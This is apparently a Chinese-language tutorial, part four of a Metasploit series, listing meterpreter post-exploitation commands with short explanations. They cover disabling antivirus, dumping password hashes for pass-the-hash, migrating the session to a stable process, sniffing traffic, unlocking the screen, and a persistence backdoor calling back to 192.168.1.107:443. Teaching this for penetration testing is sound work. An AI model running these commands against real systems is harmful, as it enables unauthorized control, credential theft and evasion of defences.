metasploit——(四)使用meterpreter脚本
通过“run 脚本名字”命令,可以在meterpreter终端中运行扩展脚本。脚本可能会直接运行,也可能提供如何使用的帮助。
1、run vnc
在受控系统上运行一个交互式的远程图形化工具,你可以使用VNC协议将受控系统的桌面通信通过隧道方式映射过来,使得你访问到远程的图形化桌面。在某些情况下,受控系统可能是被锁定的,而你无法访问到桌面。。不用担心强大的metasploit能够帮助我们搞定一切: run screen_unlock 命令对目标机器上的桌面进行解锁。。。。同理,run screen 应该就是对远程桌面进行锁定。。
2、run post/windows/manage/migrate
当我们攻击系统时,常常是对诸如 IE之类的服务器进行漏洞利用,如果目标主机关闭了浏览器,meterpreter会话也将随之被关闭,从而导致与目标系统的连接丢失。。为了避免这个问题,我们可以将meterpreter会话迁移到内存空间中的其他稳定的、不会被关闭的服务进程中,以维持稳定的系统控制连接。。
3、run killav
关闭杀毒软件
4、run hashdump
获取系统密码哈希值的副本实施哈希值传递攻击,或是进行哈希值暴力破解还原明文密码。
5、run packetrecorder -i 1
查看目标机上的所有流量
6、run scraper
获取系统信息
7、run persistence -X -i 50 -p 443 -r 192.168.1.107
确保系统重启后meterpreter还能运行。。
·